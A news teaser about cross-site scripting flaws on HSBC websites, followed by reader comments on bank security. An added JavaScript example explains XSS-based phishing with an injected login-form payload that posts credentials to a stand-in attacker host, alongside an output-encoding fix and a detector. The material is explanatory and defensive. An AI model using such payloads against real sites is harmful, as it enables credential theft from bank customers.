HSBC scripting flaws play into the hands of phishers

Several HSBC websites are subject to cross-site scripting flaws that give crooks a possible mechanism for building more convincing phishing scams. Security blog Xssed has posted a list of affected domains, which include HSBC sites in multiple territories, the UK among them. Xssed has been tracking problems on the bank's sites since …
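The teaser above says scripting flaws make phishing "more convincing" without showing why. The point is that a reflected XSS lets an attacker put their own HTML, including a login form posting to a host they control, onto a page served from the bank's real hostname, so the address bar and certificate look right. The following is an added example, not HSBC's code or anything from Xssed; the search page template, the `bank.example` and `attacker.invalid` hostnames and the `q` parameter are all invented for illustration. It renders the same page once with raw reflection and once with output encoding, and includes a crude check for forms that post off-origin.

```javascript
// Added example (not from the original page): reflected XSS as a phishing primitive,
// beside the output-encoding fix. All hostnames, paths and parameters are invented.

// Vulnerable render: the "q" query parameter is written straight into the HTML.
function renderSearchPageVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return `<html><body><h1>Search results for: ${q}</h1><p>No results.</p></body></html>`;
}

// Minimal HTML entity encoding for text placed inside an element body.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, ch => map[ch]);
}

// Fixed render: identical template, but the reflected value is encoded first.
function renderSearchPageFixed(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return `<html><body><h1>Search results for: ${escapeHtml(q)}</h1><p>No results.</p></body></html>`;
}

// Constructed attacker payload: closes the <h1>, injects a "log on" form whose
// action points at the attacker's host, then reopens an <h1> so the markup stays tidy.
const PHISH_PAYLOAD =
  '</h1><form action="https://attacker.invalid/collect" method="post">' +
  'User ID <input name="u"> Password <input name="p" type="password">' +
  '<button>Log on</button></form><h1>';

// The link a phishing e-mail would carry: it genuinely points at the bank's origin.
function phishingUrl(bankOrigin) {
  const u = new URL('/search', bankOrigin);
  u.searchParams.set('q', PHISH_PAYLOAD);
  return u.toString();
}

// Crude detector: does the rendered page contain a <form> whose action resolves
// to a different origin than the page itself? Good enough to show the difference
// between the two renderers; not a substitute for a real HTML parser.
function containsOffOriginForm(html, pageOrigin) {
  const re = /<form[^>]*\baction="([^"]+)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (new URL(m[1], pageOrigin).origin !== pageOrigin) return true;
  }
  return false;
}

const BANK_ORIGIN = 'https://bank.example';
const link = phishingUrl(BANK_ORIGIN);

const vulnerableHtml = renderSearchPageVulnerable(link);
const fixedHtml = renderSearchPageFixed(link);

console.log('Phishing link (bank origin, attacker-controlled content):', link);
console.log('Vulnerable render posts credentials off-origin:', containsOffOriginForm(vulnerableHtml, BANK_ORIGIN));
console.log('Fixed render posts credentials off-origin:', containsOffOriginForm(fixedHtml, BANK_ORIGIN));
```

The encoded version shows the payload as literal text inside the heading, so a victim sees junk rather than a login form. Encoding for the element-body context is the right fix here; a value reflected into an attribute, a URL or a script block needs the encoder for that context instead.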


  1. Mark

    HSBC / First Direct - Clueless muppets.

    I contacted them the other week with regards to EV certificates, and the fact that First Direct seemed to be failing (according to Opera's strict EV implementation); they had no idea what EV was, let alone the cross-site scripting that was breaking the site.

    I would move banks, but experience says that they are all pretty much clueless when it comes to security.

  2. amanfromMars

    Cutting to the Chase and Chastened.....

    A Right Royal Cock Up in other Words?

    And a Question for Modesty's Sake/Stake.

    cc ... HMGCC re Cinderella ProgramMIng.

    And just so atypical of Python Psyche to Fail Delivery with False Modesty.

    There's Work to be Done, Empire States 42 Build.

  3. Anonymous Coward

    Two months? What a bunch of optimists

    Two months is a rather optimistic estimate for HSBC's security process.

    Their Verified by Visa marketing gimmick was storing state in clients in a way where you could skip all verification steps with Konqueror. I tried to explain this to them and they simply did not care. So I gave up and registered with Mozilla. This was more than a year ago and last time I had a look at it the bug was still there.

    Paris, as the symbol of their (and not only their) UK banking coding quality and security.

  4. Anonymous Coward


    The UK site is still open to SQL injection attack. They also took 6 months to add a major city's branch details back to their search results, long after I had told them about the problem a total of 6 times by various means.

  5. Ian Michael Gumby

    Global Bank + global workforce = ...

    Clueless-ness on a global level.

    This is what happens when you have teams of people who don't know more than the basics and are used to thinking of security as an afterthought.

    Want someone to blame? Blame Microsoft. Yeah, Microsoft. Not because they use Microsoft's products, but because Microsoft was the first major software company whose mantra was "Rush to be first to market, then clean up the mess later."

  6. Anonymous Coward


    Yep, I think they are all about as bad as each other. Nat West/RBS assured me that if my browser passed their user agent verification then they were prepared to *guarantee* that my system was secure and they were extremely confident in this security system.

  7. Anonymous Coward

    Co-op too?

    Been getting a lot of phish-bait in the spamtrap which claims to be Co-op related recently.

  8. Solomon Grundy

    Screw It

    You know, all this Internet banking stuff is total crap. The world worked just fine (some would argue better) before everyone expected instant responses. The crap coding coming out of so many professionals these days, combined with the dishonest attitudes of so many people, completely takes away any advantage the online world offers. Except of course to get online and comment on various websites for no gain.

    Back to cash and barter.

  9. MrT

    First Direct

    I'm with them, but since I know how secure Internet banking is I always pick up the phone (landline, not VoIP). They are there 24/7 and I would rather talk than type.

    Not quite face to face, but it's on my terms and not some 'closed by 3:30' local-ish sales office (that'd be Lloyds-TSB mostly; don't know why my wife puts up with their 'annual review' insults).

